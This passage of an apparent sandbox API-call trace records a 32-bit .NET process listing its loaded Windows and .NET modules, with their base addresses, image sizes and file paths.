hProcess=0x2a0, hModule=0x73dd0000, lpmodinfo=0x23864f0, cb=0xc | out: lpmodinfo=0x23864f0*(lpBaseOfDll=0x73dd0000, SizeOfImage=0x75000, EntryPoint=0x73e09a60)) returned 1 [0145.613] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.613] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73dd0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0145.614] CoTaskMemFree (pv=0x55b0d0) [0145.614] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.614] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73dd0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0145.614] CoTaskMemFree (pv=0x55b0d0) [0145.614] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69e40000, lpmodinfo=0x23885fc, cb=0xc | out: lpmodinfo=0x23885fc*(lpBaseOfDll=0x69e40000, SizeOfImage=0x80000, EntryPoint=0x69e41180)) returned 1 [0145.615] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.615] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69e40000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0145.616] CoTaskMemFree (pv=0x55b0d0) [0145.616] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.616] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69e40000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0145.617] CoTaskMemFree (pv=0x55b0d0) [0145.617] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76680000, lpmodinfo=0x238a73c, cb=0xc | out: lpmodinfo=0x238a73c*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0145.617] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.617] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76680000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0145.618] CoTaskMemFree (pv=0x55b0d0) [0145.618] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.618] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76680000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0145.619] CoTaskMemFree (pv=0x55b0d0) [0145.619] GetModuleInformation (in: hProcess=0x2a0, hModule=0x676e0000, lpmodinfo=0x238c850, cb=0xc | out: lpmodinfo=0x238c850*(lpBaseOfDll=0x676e0000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0145.624] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.624] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x676e0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0145.624] CoTaskMemFree (pv=0x55b0d0) [0145.624] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.624] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x676e0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0145.625] CoTaskMemFree (pv=0x55b0d0) [0145.625] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69c40000, lpmodinfo=0x238e9ec, cb=0xc | out: lpmodinfo=0x238e9ec*(lpBaseOfDll=0x69c40000, SizeOfImage=0x18f000, EntryPoint=0x0)) returned 1 [0145.626] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.626] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69c40000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0145.626] CoTaskMemFree (pv=0x55b0d0) [0145.626] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.626] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69c40000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")) returned 0x74 [0145.627] CoTaskMemFree (pv=0x55b0d0) [0145.627] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66a70000, lpmodinfo=0x2390bb8, cb=0xc | out: lpmodinfo=0x2390bb8*(lpBaseOfDll=0x66a70000, SizeOfImage=0xc67000, EntryPoint=0x0)) returned 1 [0145.628] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.628] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66a70000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0145.628] CoTaskMemFree (pv=0x55b0d0) [0145.628] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.628] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66a70000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")) returned 0x80 [0145.629] CoTaskMemFree (pv=0x55b0d0) [0145.629] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6b4d0000, lpmodinfo=0x2392da8, cb=0xc | out: lpmodinfo=0x2392da8*(lpBaseOfDll=0x6b4d0000, SizeOfImage=0x92000, EntryPoint=0x6b4ddd60)) returned 1 [0145.630] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.630] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0145.630] CoTaskMemFree (pv=0x55b0d0) [0145.630] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.631] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0145.631] CoTaskMemFree (pv=0x55b0d0) [0145.631] GetModuleInformation (in: hProcess=0x2a0, hModule=0x72d30000, lpmodinfo=0x2394f6c, cb=0xc | out: lpmodinfo=0x2394f6c*(lpBaseOfDll=0x72d30000, SizeOfImage=0x20f000, EntryPoint=0x72ddb0a0)) returned 1 [0145.632] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.632] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x72d30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0145.633] CoTaskMemFree (pv=0x55b0d0) [0145.633] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.633] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x72d30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")) returned 0x77 [0145.634] CoTaskMemFree (pv=0x55b0d0) [0145.634] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73db0000, lpmodinfo=0x2397238, cb=0xc | out: lpmodinfo=0x2397238*(lpBaseOfDll=0x73db0000, SizeOfImage=0x1d000, EntryPoint=0x73db3b10)) returned 1 [0145.635] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.635] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73db0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0145.636] CoTaskMemFree (pv=0x55b0d0) [0145.636] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.636] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73db0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0145.636] CoTaskMemFree (pv=0x55b0d0) [0145.636] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66320000, lpmodinfo=0x2399344, cb=0xc | out: lpmodinfo=0x2399344*(lpBaseOfDll=0x66320000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0145.637] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.637] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66320000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0145.638] CoTaskMemFree (pv=0x55b0d0) [0145.638] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.638] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66320000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0145.639] CoTaskMemFree (pv=0x55b0d0) [0145.639] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66220000, lpmodinfo=0x239b500, cb=0xc | out: lpmodinfo=0x239b500*(lpBaseOfDll=0x66220000, SizeOfImage=0xf1000, EntryPoint=0x0)) returned 1 [0145.639] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.639] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66220000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Configuration.ni.dll") returned 0x1b [0145.640] CoTaskMemFree (pv=0x55b0d0) [0145.640] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.640] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66220000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll")) returned 0x80 [0145.641] CoTaskMemFree (pv=0x55b0d0) [0145.641] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65b00000, lpmodinfo=0x239d6f0, cb=0xc | out: lpmodinfo=0x239d6f0*(lpBaseOfDll=0x65b00000, SizeOfImage=0x71e000, EntryPoint=0x0)) returned 1 [0145.642] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.642] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65b00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Xml.ni.dll") returned 0x11 [0145.642] CoTaskMemFree (pv=0x55b0d0) [0145.642] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.643] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65b00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll")) returned 0x6c [0145.643] CoTaskMemFree (pv=0x55b0d0) [0145.643] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764d0000, lpmodinfo=0x239f8a4, cb=0xc | out: lpmodinfo=0x239f8a4*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0145.644] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.644] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0145.645] CoTaskMemFree (pv=0x55b0d0) [0145.645] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.645] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0145.646] CoTaskMemFree (pv=0x55b0d0) [0145.646] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a50000, lpmodinfo=0x23a19a8, cb=0xc | out: lpmodinfo=0x23a19a8*(lpBaseOfDll=0x65a50000, SizeOfImage=0xa5000, EntryPoint=0x65a6ac50)) returned 1 [0145.647] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.647] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasapi32.dll") returned 0xc [0145.648] CoTaskMemFree (pv=0x55b0d0) [0145.648] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.648] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")) returned 0x20 [0145.649] CoTaskMemFree (pv=0x55b0d0) [0145.649] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a20000, lpmodinfo=0x23a3abc, cb=0xc | out: lpmodinfo=0x23a3abc*(lpBaseOfDll=0x65a20000, SizeOfImage=0x23000, EntryPoint=0x65a25570)) returned 1 [0145.649] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.650] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a20000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0145.651] CoTaskMemFree (pv=0x55b0d0) [0145.651] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.651] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a20000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")) returned 0x1e [0145.652] CoTaskMemFree (pv=0x55b0d0) [0145.652] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a10000, lpmodinfo=0x23a5bc8, cb=0xc | out: lpmodinfo=0x23a5bc8*(lpBaseOfDll=0x65a10000, SizeOfImage=0x10000, EntryPoint=0x65a13820)) returned 1 [0145.653] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.653] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a10000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0145.654] CoTaskMemFree (pv=0x55b0d0) [0145.654] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.654] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a10000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")) returned 0x1f [0145.655] CoTaskMemFree (pv=0x55b0d0) [0145.655] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f30000, lpmodinfo=0x23a7cd4, cb=0xc | out: lpmodinfo=0x23a7cd4*(lpBaseOfDll=0x73f30000, SizeOfImage=0x5f000, EntryPoint=0x73f34af0)) returned 1 [0145.656] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.656] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ws2_32.dll") returned 0xa [0145.657] CoTaskMemFree (pv=0x55b0d0) [0145.657] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.657] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")) returned 0x1e [0145.658] CoTaskMemFree (pv=0x55b0d0) [0145.658] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71400000, lpmodinfo=0x23a9de0, cb=0xc | out: lpmodinfo=0x23a9de0*(lpBaseOfDll=0x71400000, SizeOfImage=0x4f000, EntryPoint=0x7140d850)) returned 1 [0145.659] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.659] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71400000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0145.660] CoTaskMemFree (pv=0x55b0d0) [0145.660] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.660] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71400000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")) returned 0x1f [0145.661] CoTaskMemFree (pv=0x55b0d0) [0145.661] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71450000, lpmodinfo=0x23abeec, cb=0xc | out: lpmodinfo=0x23abeec*(lpBaseOfDll=0x71450000, SizeOfImage=0x9b000, EntryPoint=0x7148f7e0)) returned 1 [0145.661] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.661] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71450000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="winhttp.dll") returned 0xb [0145.662] CoTaskMemFree (pv=0x55b0d0) [0145.662] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.662] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71450000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")) returned 0x1f [0145.663] CoTaskMemFree (pv=0x55b0d0) [0145.663] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71520000, lpmodinfo=0x23adff8, cb=0xc | out: lpmodinfo=0x23adff8*(lpBaseOfDll=0x71520000, SizeOfImage=0x12000, EntryPoint=0x71524510)) returned 1 [0145.664] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.664] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71520000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ondemandconnroutehelper.dll") returned 0x1b [0145.665] CoTaskMemFree (pv=0x55b0d0) [0145.665] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.665] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71520000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")) returned 0x2f [0145.669] CoTaskMemFree (pv=0x55b0d0) [0145.669] GetModuleInformation (in: hProcess=0x2a0, hModule=0x714f0000, lpmodinfo=0x23b0144, cb=0xc | out: lpmodinfo=0x23b0144*(lpBaseOfDll=0x714f0000, SizeOfImage=0x2f000, EntryPoint=0x714fbb70)) returned 1 [0145.670] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.670] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x714f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0145.671] CoTaskMemFree (pv=0x55b0d0) [0145.671] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.671] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x714f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")) returned 0x20 [0145.672] CoTaskMemFree (pv=0x55b0d0) [0145.672] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76900000, lpmodinfo=0x23b2258, cb=0xc | out: lpmodinfo=0x23b2258*(lpBaseOfDll=0x76900000, SizeOfImage=0x7000, EntryPoint=0x76901e10)) returned 1 [0145.673] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.673] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76900000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0145.674] CoTaskMemFree (pv=0x55b0d0) [0145.674] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.674] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76900000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NSI.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")) returned 0x1b [0145.675] CoTaskMemFree (pv=0x55b0d0) [0145.675] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a860000, lpmodinfo=0x23b4354, cb=0xc | out: lpmodinfo=0x23b4354*(lpBaseOfDll=0x6a860000, SizeOfImage=0x13000, EntryPoint=0x6a8625d0)) returned 1 [0145.675] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.675] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a860000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0145.676] CoTaskMemFree (pv=0x55b0d0) [0145.676] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.676] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a860000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")) returned 0x21 [0145.677] CoTaskMemFree (pv=0x55b0d0) [0145.677] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a840000, lpmodinfo=0x23b6468, cb=0xc | out: lpmodinfo=0x23b6468*(lpBaseOfDll=0x6a840000, SizeOfImage=0x14000, EntryPoint=0x6a843c10)) returned 1 [0145.678] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.678] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0145.679] CoTaskMemFree (pv=0x55b0d0) [0145.679] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.679] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")) returned 0x20 [0145.680] CoTaskMemFree (pv=0x55b0d0) [0145.680] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74eb0000, lpmodinfo=0x23b857c, cb=0xc | out: lpmodinfo=0x23b857c*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0145.681] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.681] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74eb0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0145.683] CoTaskMemFree (pv=0x55b0d0) [0145.683] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.683] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74eb0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0145.684] CoTaskMemFree (pv=0x55b0d0) [0145.684] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76800000, lpmodinfo=0x23ba688, cb=0xc | out: lpmodinfo=0x23ba688*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0145.685] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.685] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76800000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0145.686] CoTaskMemFree (pv=0x55b0d0) [0145.686] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.686] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76800000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0145.687] CoTaskMemFree (pv=0x55b0d0) [0145.687] GetModuleInformation (in: hProcess=0x2a0, hModule=0x745b0000, lpmodinfo=0x23bc79c, cb=0xc | out: lpmodinfo=0x23bc79c*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0145.688] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.688] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x745b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0145.690] CoTaskMemFree (pv=0x55b0d0) [0145.690] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.690] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x745b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0145.691] CoTaskMemFree (pv=0x55b0d0) [0145.691] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74520000, lpmodinfo=0x23be8c8, cb=0xc | out: lpmodinfo=0x23be8c8*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0145.692] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.692] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74520000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0145.693] CoTaskMemFree (pv=0x55b0d0) [0145.693] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.693] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74520000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0145.694] CoTaskMemFree (pv=0x55b0d0) [0145.694] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76470000, lpmodinfo=0x23c09d4, cb=0xc | out: lpmodinfo=0x23c09d4*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0145.695] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.695] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76470000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0145.696] CoTaskMemFree (pv=0x55b0d0) [0145.696] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.696] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76470000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0145.714] CoTaskMemFree (pv=0x55b0d0) [0145.714] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f20000, lpmodinfo=0x23c2ae8, cb=0xc | out: lpmodinfo=0x23c2ae8*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0145.715] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.715] GetModuleBaseNameW (in: 